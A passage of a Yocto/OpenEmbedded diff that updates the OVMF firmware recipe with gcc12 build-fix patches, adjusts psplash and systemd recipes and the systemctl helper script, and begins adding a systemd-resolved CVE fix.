+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
@@ -0,0 +1,53 @@
+From 24551a99d1f765c891a4dc21a36f18ccbf56e612 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Tue, 10 Jan 2023 06:15:00 -1000
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+Sdk/C/LzmaEnc.c: In function ?LzmaEnc_CodeOneMemBlock?:
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*p.rc.outStream? [-Werror=dangling-pointer=]
+ 2828 |   p->rc.outStream = &outStream.vt;
+      |   ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
+ 2811 |   CLzmaEnc_SeqOutStreamBuf outStream;
+      |                            ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*(CLzmaEnc *)pp.rc.outStream? [-Werror=dangling-pointer=]
+ 2828 |   p->rc.outStream = &outStream.vt;
+      |   ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
+ 2811 |   CLzmaEnc_SeqOutStreamBuf outStream;
+      |                            ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
+cc1: all warnings being treated as errors
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/85021f8cf22d1bd4114803c6c610dea5ef0059f1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+index e281716fee..b575c4f888 100644
+--- a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
++++ b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+@@ -2638,12 +2638,13 @@ SRes LzmaEnc_CodeOneMemBlock(CLzmaEncHandle pp, Bool reInit,
+ 

+   nowPos64 = p->nowPos64;

+   RangeEnc_Init(&p->rc);

+-  p->rc.outStream = &outStream.vt;

+ 

+   if (desiredPackSize == 0)

+     return SZ_ERROR_OUTPUT_EOF;

+ 

++  p->rc.outStream = &outStream.vt;

+   res = LzmaEnc_CodeOneBlock(p, desiredPackSize, *unpackSize);

++  p->rc.outStream = NULL;

+   

+   *unpackSize = (UInt32)(p->nowPos64 - nowPos64);

+   *destLen -= outStream.rem;

+-- 
+2.25.1
+
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
new file mode 100644
index 0000000000..73a432684c
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
@@ -0,0 +1,41 @@
+From 22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:36 +0800
+Subject: [PATCH] Basetools: turn off gcc12 warning
+
+In function ?SetDevicePathEndNode?,
+    inlined from ?FileDevicePath? at DevicePathUtilities.c:857:5:
+DevicePathUtilities.c:321:3: error: writing 4 bytes into a region of size 1 [-Werror=stringop-overflow=]
+  321 |   memcpy (Node, &mUefiDevicePathLibEndDevicePath, sizeof (mUefiDevicePathLibEndDevicePath));
+      |   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In file included from UefiDevicePathLib.h:22,
+                 from DevicePathUtilities.c:16:
+../Include/Protocol/DevicePath.h: In function ?FileDevicePath?:
+../Include/Protocol/DevicePath.h:51:9: note: destination object ?Type? of size 1
+   51 |   UINT8 Type;       ///< 0x01 Hardware Device Path.
+      |         ^~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/DevicePath/GNUmakefile | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/BaseTools/Source/C/DevicePath/GNUmakefile b/BaseTools/Source/C/DevicePath/GNUmakefile
+index 7ca08af9662d..b05d2bddfa68 100644
+--- a/BaseTools/Source/C/DevicePath/GNUmakefile
++++ b/BaseTools/Source/C/DevicePath/GNUmakefile
+@@ -13,6 +13,9 @@ OBJECTS = DevicePath.o UefiDevicePathLib.o DevicePathFromText.o  DevicePathUtili
+ 

+ include $(MAKEROOT)/Makefiles/app.makefile

+ 

++# gcc 12 trips over device path handling

++BUILD_CFLAGS += -Wno-error=stringop-overflow

++

+ LIBS = -lCommon

+ ifeq ($(CYGWIN), CYGWIN)

+   LIBS += -L/lib/e2fsprogs -luuid

diff --git a/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
new file mode 100644
index 0000000000..d658123b81
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
@@ -0,0 +1,51 @@
+From 498627ebda6271b59920f43a0b9b6187edeb7b09 Mon Sep 17 00:00:00 2001
+From: Adrian Herrera <adr.her.arc.95@gmail.com>
+Date: Mon, 22 Mar 2021 21:06:47 +0000
+Subject: [PATCH] Fix VLA parameter warning
+
+Make VLA buffer types consistent in declarations and definitions.
+Resolves build crash when using -Werror due to "vla-parameter" warning.
+
+Upstream-Status: Submitted [https://github.com/google/brotli/pull/893]
+Signed-off-by: Adrian Herrera <adr.her.arc.95@gmail.com>
+---
+ c/dec/decode.c | 6 ++++--
+ c/enc/encode.c | 5 +++--
+ 2 files changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+index 114c505..bb6f1ab 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
++++ b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+@@ -2030,8 +2030,10 @@ static BROTLI_NOINLINE BrotliDecoderErrorCode SafeProcessCommands(
+ }
+ 
+ BrotliDecoderResult BrotliDecoderDecompress(
+-    size_t encoded_size, const uint8_t* encoded_buffer, size_t* decoded_size,
+-    uint8_t* decoded_buffer) {
++    size_t encoded_size,
++    const uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(encoded_size)],
++    size_t* decoded_size,
++    uint8_t decoded_buffer[BROTLI_ARRAY_PARAM(*decoded_size)]) {
+   BrotliDecoderState s;
+   BrotliDecoderResult result;
+   size_t total_out = 0;
+diff --git a/c/enc/encode.c b/c/enc/encode.c
+index 68548ef..ab0a490 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
++++ c/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
+@@ -1470,8 +1470,9 @@ static size_t MakeUncompressedStream(
+ 
+ BROTLI_BOOL BrotliEncoderCompress(
+     int quality, int lgwin, BrotliEncoderMode mode, size_t input_size,
+-    const uint8_t* input_buffer, size_t* encoded_size,
+-    uint8_t* encoded_buffer) {
++    const uint8_t input_buffer[BROTLI_ARRAY_PARAM(input_size)],
++    size_t* encoded_size,
++    uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(*encoded_size)]) {
+   BrotliEncoderState* s;
+   size_t out_size = *encoded_size;
+   const uint8_t* input_start = input_buffer;
+-- 
+2.31.1
+
diff --git a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
index 6ecb23b29f..c32963a807 100644
--- a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
+++ b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
@@ -1,7 +1,7 @@
-From 0a8362cfb9f00870d70687475665b131dd82c947 Mon Sep 17 00:00:00 2001
+From 200ff35c6545b4ab85f5ea7a6096fbaec3d82f6d Mon Sep 17 00:00:00 2001
 From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
 Date: Thu, 9 Jun 2016 02:23:01 -0700
-Subject: [PATCH 1/5] ovmf: update path to native BaseTools
+Subject: [PATCH 1/4] ovmf: update path to native BaseTools
 
 BaseTools is a set of utilities to build EDK-based firmware. These utilities
 are used during the build process. Thus, they need to be built natively.
@@ -30,5 +30,5 @@ index 91b1442ade..1858dae31a 100755
    source edksetup.sh BaseTools
  else
 -- 
-2.17.1
+2.28.0
 
diff --git a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
index f37ed018ab..c61a08f022 100644
--- a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
+++ b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
@@ -1,7 +1,7 @@
-From a8bceaec1b16fffbf6810df05503d8ae9092b735 Mon Sep 17 00:00:00 2001
+From 667c0cf97dadc4f5994d26ec3984f559a05ec406 Mon Sep 17 00:00:00 2001
 From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
 Date: Fri, 26 Jul 2019 17:34:26 -0400
-Subject: [PATCH 2/5] BaseTools: makefile: adjust to build in under bitbake
+Subject: [PATCH 2/4] BaseTools: makefile: adjust to build in under bitbake
 
 Prepend the build flags with those of bitbake. This is to build
 using the bitbake native sysroot include and library directories.
@@ -10,14 +10,14 @@ Signed-off-by: Ricardo Neri <ricardo.neri@linux.intel.com>
 Upstream-Status: Pending
 
 ---
- BaseTools/Source/C/Makefiles/header.makefile | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
+ BaseTools/Source/C/Makefiles/header.makefile | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
 
 diff --git a/BaseTools/Source/C/Makefiles/header.makefile b/BaseTools/Source/C/Makefiles/header.makefile
-index 4e9b36d98b..eb03ee33fa 100644
+index 1c105ee7d4..d5eea3864e 100644
 --- a/BaseTools/Source/C/Makefiles/header.makefile
 +++ b/BaseTools/Source/C/Makefiles/header.makefile
-@@ -62,23 +62,23 @@ $(error Bad HOST_ARCH)
+@@ -69,35 +69,36 @@ $(error Bad HOST_ARCH)
  endif

  

  INCLUDE = $(TOOL_INCLUDE) -I $(MAKEROOT) -I $(MAKEROOT)/Include/Common -I $(MAKEROOT)/Include/ -I $(MAKEROOT)/Include/IndustryStandard -I $(MAKEROOT)/Common/ -I .. -I . $(ARCH_INCLUDE)

@@ -33,19 +33,35 @@ index 4e9b36d98b..eb03ee33fa 100644
 +BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -Wall -Werror \

  -Wno-deprecated-declarations -Wno-self-assign -Wno-unused-result -nostdlib -g

  else

+ ifeq ($(CXX), llvm)

+-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \

++BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \

+ -fno-delete-null-pointer-checks -Wall -Werror \

+ -Wno-deprecated-declarations -Wno-self-assign \

+ -Wno-unused-result -nostdlib -g

+ else

 -BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \

 +BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \

  -fno-delete-null-pointer-checks -Wall -Werror \

  -Wno-deprecated-declarations -Wno-stringop-truncation -Wno-restrict \

  -Wno-unused-result -nostdlib -g

  endif

+ endif

+ ifeq ($(CXX), llvm)

+-BUILD_LFLAGS =

+-BUILD_CXXFLAGS = -Wno-deprecated-register -Wno-unused-result

++BUILD_LFLAGS = $(LDFLAGS)

++BUILD_CXXFLAGS += -Wno-deprecated-register -Wno-unused-result

+ else

 -BUILD_LFLAGS =

 -BUILD_CXXFLAGS = -Wno-unused-result

 +BUILD_LFLAGS = $(LDFLAGS)

 +BUILD_CXXFLAGS += -Wno-unused-result

- 

+ endif

++

  ifeq ($(HOST_ARCH), IA32)

  #

+ # Snow Leopard  is a 32-bit and 64-bit environment. uname -m returns i386, but gcc defaults

 -- 
-2.17.1
+2.28.0
 
diff --git a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
index ab1e7db31f..df1d159011 100644
--- a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
+++ b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
@@ -1,7 +1,7 @@
-From 60a5f953f747e1e9e05a40157b651cba8ea57b91 Mon Sep 17 00:00:00 2001
+From e19481e5a64f8915ac118899b10c40d12c0f9daa Mon Sep 17 00:00:00 2001
 From: Dengke Du <dengke.du@windriver.com>
 Date: Mon, 11 Sep 2017 02:21:55 -0400
-Subject: [PATCH 3/5] ovmf: enable long path file
+Subject: [PATCH 3/4] ovmf: enable long path file
 
 Upstream-Status: Pending
 Signed-off-by: Dengke Du <dengke.du@windriver.com>
@@ -24,5 +24,5 @@ index e1cce985f7..d67d03c70c 100644
  #define MAX_UINT64 ((UINT64)0xFFFFFFFFFFFFFFFFULL)

  #define MAX_UINT32 ((UINT32)0xFFFFFFFF)

 -- 
-2.17.1
+2.28.0
 
diff --git a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
index c10a39d95d..128438b201 100644
--- a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
+++ b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
@@ -1,7 +1,7 @@
-From 94eff316b31b4d0348af28c77be5c00bc09fe8e7 Mon Sep 17 00:00:00 2001
+From ad06fcf1e08736e79221cd6863ff2e3c9254f261 Mon Sep 17 00:00:00 2001
 From: Steve Langasek <steve.langasek@ubuntu.com>
 Date: Sat, 10 Jun 2017 01:39:36 -0700
-Subject: [PATCH 4/5] ovmf: Update to latest
+Subject: [PATCH 4/4] ovmf: Update to latest
 
 Description: pass -fno-stack-protector to all GCC toolchains
  The upstream build rules inexplicably pass -fno-stack-protector only
@@ -15,15 +15,15 @@ Upstream-Status: Pending
  1 file changed, 4 insertions(+), 4 deletions(-)
 
 diff --git a/BaseTools/Conf/tools_def.template b/BaseTools/Conf/tools_def.template
-index ca0b122dbb..b0066c2ab8 100755
+index 933b3160fd..c2fbbf0c38 100755
 --- a/BaseTools/Conf/tools_def.template
 +++ b/BaseTools/Conf/tools_def.template
-@@ -1941,10 +1941,10 @@ DEFINE GCC_X64_RC_FLAGS            = -I binary -O elf64-x86-64        -B i386
- DEFINE GCC_ARM_RC_FLAGS            = -I binary -O elf32-littlearm     -B arm     --rename-section .data=.hii

- DEFINE GCC_AARCH64_RC_FLAGS        = -I binary -O elf64-littleaarch64 -B aarch64 --rename-section .data=.hii

+@@ -1952,10 +1952,10 @@ DEFINE GCC_RISCV64_RC_FLAGS        = -I binary -O elf64-littleriscv   -B riscv
+ # GCC Build Flag for included header file list generation

+ DEFINE GCC_DEPS_FLAGS              = -MMD -MF $@.deps

  

--DEFINE GCC48_ALL_CC_FLAGS            = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings

-+DEFINE GCC48_ALL_CC_FLAGS            = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -fno-stack-protector -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings

+-DEFINE GCC48_ALL_CC_FLAGS            = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings

++DEFINE GCC48_ALL_CC_FLAGS            = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -fno-stack-protector -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings

  DEFINE GCC48_IA32_X64_DLINK_COMMON   = -nostdlib -Wl,-n,-q,--gc-sections -z common-page-size=0x20

 -DEFINE GCC48_IA32_CC_FLAGS           = DEF(GCC48_ALL_CC_FLAGS) -m32 -march=i586 -malign-double -fno-stack-protector -D EFI32 -fno-asynchronous-unwind-tables -Wno-address

 -DEFINE GCC48_X64_CC_FLAGS            = DEF(GCC48_ALL_CC_FLAGS) -m64 -fno-stack-protector "-DEFIAPI=__attribute__((ms_abi))" -maccumulate-outgoing-args -mno-red-zone -Wno-address -mcmodel=small -fpie -fno-asynchronous-unwind-tables -Wno-address

@@ -32,7 +32,7 @@ index ca0b122dbb..b0066c2ab8 100755
  DEFINE GCC48_IA32_X64_ASLDLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,ReferenceAcpiTable -u ReferenceAcpiTable

  DEFINE GCC48_IA32_X64_DLINK_FLAGS    = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,$(IMAGE_ENTRY_POINT) -u $(IMAGE_ENTRY_POINT) -Wl,-Map,$(DEST_DIR_DEBUG)/$(BASE_NAME).map,--whole-archive

  DEFINE GCC48_IA32_DLINK2_FLAGS       = -Wl,--defsym=PECOFF_HEADER_SIZE=0x220 DEF(GCC_DLINK2_FLAGS_COMMON)

-@@ -1953,7 +1953,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS        = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
+@@ -1964,7 +1964,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS        = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
  DEFINE GCC48_ASM_FLAGS               = DEF(GCC_ASM_FLAGS)

  DEFINE GCC48_ARM_ASM_FLAGS           = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian

  DEFINE GCC48_AARCH64_ASM_FLAGS       = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian

@@ -42,5 +42,5 @@ index ca0b122dbb..b0066c2ab8 100755
  DEFINE GCC48_AARCH64_CC_FLAGS        = $(ARCHCC_FLAGS) $(PLATFORM_FLAGS) -mcmodel=large DEF(GCC_AARCH64_CC_FLAGS)

  DEFINE GCC48_AARCH64_CC_XIPFLAGS     = DEF(GCC_AARCH64_CC_XIPFLAGS)

 -- 
-2.17.1
+2.28.0
 
diff --git a/meta/recipes-core/ovmf/ovmf_git.bb b/meta/recipes-core/ovmf/ovmf_git.bb
index 9667fa0c86..a487f77e3c 100644
--- a/meta/recipes-core/ovmf/ovmf_git.bb
+++ b/meta/recipes-core/ovmf/ovmf_git.bb
@@ -12,15 +12,19 @@ LIC_FILES_CHKSUM = "file://OvmfPkg/License.txt;md5=06357ddc23f46577c2aeaeaf7b776
 PACKAGECONFIG ??= ""
 PACKAGECONFIG[secureboot] = ",,,"
 
-SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=git \
+SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=https \
            file://0001-ovmf-update-path-to-native-BaseTools.patch \
            file://0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch \
            file://0003-ovmf-enable-long-path-file.patch \
            file://0004-ovmf-Update-to-latest.patch \
-        "
-
-PV = "edk2-stable201911"
-SRCREV = "bd85bf54c268204c7a698a96f3ccd96cd77952cd"
+           file://0001-Fix-VLA-parameter-warning.patch \
+           file://0001-Basetools-genffs-fix-gcc12-warning.patch \
+           file://0001-Basetools-lzmaenc-fix-gcc12-warning.patch \
+           file://0001-Basetools-turn-off-gcc12-warning.patch \
+           "
+
+PV = "edk2-stable202008"
+SRCREV = "06dc822d045c2bb42e497487935485302486e151"
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>edk2-stable.*)"
 
 inherit deploy
@@ -37,7 +41,7 @@ EDK_TOOLS_DIR="edk2_basetools"
 BUILD_OPTIMIZATION="-pipe"
 
 # OVMF supports IA only, although it could conceivably support ARM someday.
-COMPATIBLE_HOST='(i.86|x86_64).*'
+COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
 
 # Additional build flags for OVMF with Secure Boot.
 # Fedora also uses "-D SMM_REQUIRE -D EXCLUDE_SHELL_FROM_FD".
diff --git a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
index 5ec3f6c927..5523f874db 100644
--- a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
+++ b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
@@ -4,3 +4,4 @@ PR = "r1"
 inherit packagegroup
 
 RDEPENDS_${PN} = "dropbear"
+RRECOMMENDS_${PN} = "openssh-sftp-server"
diff --git a/meta/recipes-core/psplash/files/psplash-start.service b/meta/recipes-core/psplash/files/psplash-start.service
index 36c2bb38e0..bec9368427 100644
--- a/meta/recipes-core/psplash/files/psplash-start.service
+++ b/meta/recipes-core/psplash/files/psplash-start.service
@@ -2,6 +2,7 @@
 Description=Start psplash boot splash screen
 DefaultDependencies=no
 RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
 
 [Service]
 Type=notify
diff --git a/meta/recipes-core/psplash/files/psplash-systemd.service b/meta/recipes-core/psplash/files/psplash-systemd.service
index 082207f232..e93e3deb35 100644
--- a/meta/recipes-core/psplash/files/psplash-systemd.service
+++ b/meta/recipes-core/psplash/files/psplash-systemd.service
@@ -4,6 +4,7 @@ DefaultDependencies=no
 After=psplash-start.service
 Requires=psplash-start.service
 RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
 
 [Service]
 ExecStart=/usr/bin/psplash-systemd
diff --git a/meta/recipes-core/psplash/psplash_git.bb b/meta/recipes-core/psplash/psplash_git.bb
index 22c71f099b..b2947c2114 100644
--- a/meta/recipes-core/psplash/psplash_git.bb
+++ b/meta/recipes-core/psplash/psplash_git.bb
@@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962"
 PV = "0.1+git${SRCPV}"
 PR = "r15"
 
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
            file://psplash-init \
            file://psplash-start.service \
            file://psplash-systemd.service \
diff --git a/meta/recipes-core/systemd/systemd-boot_244.3.bb b/meta/recipes-core/systemd/systemd-boot_244.5.bb
index f92c639810..f92c639810 100644
--- a/meta/recipes-core/systemd/systemd-boot_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-boot_244.5.bb
diff --git a/meta/recipes-core/systemd/systemd-conf/wired.network b/meta/recipes-core/systemd/systemd-conf/wired.network
index ff807ba31f..34c20fcb24 100644
--- a/meta/recipes-core/systemd/systemd-conf/wired.network
+++ b/meta/recipes-core/systemd/systemd-conf/wired.network
@@ -1,6 +1,7 @@
 [Match]
 Name=en* eth*
 KernelCommandLine=!nfsroot
+KernelCommandLine=!ip
 
 [Network]
 DHCP=yes
diff --git a/meta/recipes-core/systemd/systemd-conf_244.3.bb b/meta/recipes-core/systemd/systemd-conf_244.3.bb
index d9ec023bfd..9b797a91f4 100644
--- a/meta/recipes-core/systemd/systemd-conf_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-conf_244.3.bb
@@ -23,9 +23,6 @@ do_install() {
 # Based on change from YP bug 8141, OE commit 5196d7bacaef1076c361adaa2867be31759c1b52
 do_install_append_qemuall() {
 	install -D -m0644 ${WORKDIR}/system.conf-qemuall ${D}${systemd_unitdir}/system.conf.d/01-${PN}.conf
-
-	# Do not install wired.network for qemu bsps
-	rm -rf ${D}${systemd_unitdir}/network
 }
 
 PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-core/systemd/systemd-systemctl/systemctl b/meta/recipes-core/systemd/systemd-systemctl/systemctl
index 990de1ab39..e003c860e3 100755
--- a/meta/recipes-core/systemd/systemd-systemctl/systemctl
+++ b/meta/recipes-core/systemd/systemd-systemctl/systemctl
@@ -11,6 +11,7 @@ import re
 import sys
 
 from collections import namedtuple
+from itertools import chain
 from pathlib import Path
 
 version = 1.0
@@ -25,12 +26,16 @@ locations = list()
 
 class SystemdFile():
     """Class representing a single systemd configuration file"""
-    def __init__(self, root, path):
+    def __init__(self, root, path, instance_unit_name):
         self.sections = dict()
         self._parse(root, path)
         dirname = os.path.basename(path.name) + ".d"
         for location in locations:
-            for path2 in sorted((root / location / "system" / dirname).glob("*.conf")):                
+            files = (root / location / "system" / dirname).glob("*.conf")
+            if instance_unit_name:
+                inst_dirname = instance_unit_name + ".d"
+                files = chain(files, (root / location / "system" / inst_dirname).glob("*.conf"))
+            for path2 in sorted(files):
                 self._parse(root, path2)
 
     def _parse(self, root, path):
@@ -177,12 +182,14 @@ class SystemdUnit():
 
         raise SystemdUnitNotFoundError(self.root, unit)
 
-    def _process_deps(self, config, service, location, prop, dirstem):
+    def _process_deps(self, config, service, location, prop, dirstem, instance):
         systemdir = self.root / SYSCONFDIR / "systemd" / "system"
 
         target = ROOT / location.relative_to(self.root)
         try:
             for dependent in config.get('Install', prop):
+                # expand any %i to instance (ignoring escape sequence %%)
+                dependent = re.sub("([^%](%%)*)%i", "\\g<1>{}".format(instance), dependent)
                 wants = systemdir / "{}.{}".format(dependent, dirstem) / service
                 add_link(wants, target)
 
@@ -193,8 +200,11 @@ class SystemdUnit():
         # if we're enabling an instance, first extract the actual instance
         # then figure out what the template unit is
         template = re.match(r"[^@]+@(?P<instance>[^\.]*)\.", self.unit)
+        instance_unit_name = None
         if template:
             instance = template.group('instance')
+            if instance != "":
+                instance_unit_name = self.unit
             unit = re.sub(r"@[^\.]*\.", "@.", self.unit, 1)
         else:
             instance = None
@@ -206,7 +216,7 @@ class SystemdUnit():
             # ignore aliases
             return
 
-        config = SystemdFile(self.root, path)
+        config = SystemdFile(self.root, path, instance_unit_name)
         if instance == "":
             try:
                 default_instance = config.get('Install', 'DefaultInstance')[0]
@@ -219,8 +229,8 @@ class SystemdUnit():
         else:
             service = self.unit
 
-        self._process_deps(config, service, path, 'WantedBy', 'wants')
-        self._process_deps(config, service, path, 'RequiredBy', 'requires')
+        self._process_deps(config, service, path, 'WantedBy', 'wants', instance)
+        self._process_deps(config, service, path, 'RequiredBy', 'requires', instance)
 
         try:
             for also in config.get('Install', 'Also'):
diff --git a/meta/recipes-core/systemd/systemd.inc b/meta/recipes-core/systemd/systemd.inc
index e73b397b5d..8b5260bb0d 100644
--- a/meta/recipes-core/systemd/systemd.inc
+++ b/meta/recipes-core/systemd/systemd.inc
@@ -14,8 +14,8 @@ LICENSE = "GPLv2 & LGPLv2.1"
 LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \
                     file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c"
 
-SRCREV = "b7ed902b2394f94e7f1fbe6c3194b5cd9a9429e6"
+SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6"
 SRCBRANCH = "v244-stable"
-SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/systemd/systemd/00-create-volatile.conf b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
index 87cbe1e7d3..c4277221a2 100644
--- a/meta/recipes-core/systemd/systemd/00-create-volatile.conf
+++ b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
@@ -3,5 +3,6 @@
 # inside /var/log.
 
 
+d		/run/lock		1777	-	-	-
 d		/var/volatile/log		-	-	-	-
 d		/var/volatile/tmp		1777	-	-
diff --git a/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
new file mode 100644
index 0000000000..8d3801a248
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
@@ -0,0 +1,120 @@
+From 3f9d9289ee8730a81a0464539f4e1ba2d23d0ce9 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 3 Mar 2020 23:31:25 +0000
+Subject: [PATCH] systemd-resolved: use hostname for certificate validation in
+ DoT
+
+Widely accepted certificates for IP addresses are expensive and only
+affordable for larger organizations. Therefore if the user provides
+the hostname in the DNS= option, we should use it instead of the IP
+address.
+
